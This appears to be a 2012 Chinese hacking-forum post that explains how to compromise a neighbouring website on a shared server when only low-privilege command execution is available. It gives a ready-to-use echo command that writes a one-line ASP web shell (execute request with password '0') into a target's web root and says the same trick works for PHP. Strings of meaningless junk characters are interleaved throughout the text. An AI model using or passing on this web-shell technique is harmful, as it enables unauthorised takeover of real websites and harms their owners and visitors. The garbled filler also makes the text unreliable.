在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。3 I9 K. \' P. Q1 y
# \) ? _. S$ v6 W( o! Z
命令格式
; |5 L; H) N0 t) [7 E8 ~1 l; u$ ~. K; P @: O
Echo 语句 >目标站绝对目录
3 M. K, J9 W% \. E9 V* O6 w9 Q, R" X# \8 U$ k/ w' U
例如: 0 M% b E% x2 u# ?& u
2 w- h2 g. ?$ w$ [6 a' Z$ Z
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
# j# w. @- {: g6 L$ j) p# K+ Y! L$ Z/ {6 B0 S. b
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
1 t( O1 I4 M3 m$ h, w# k |
发表于 2012-9-23 14:40:24
收藏
支持
反对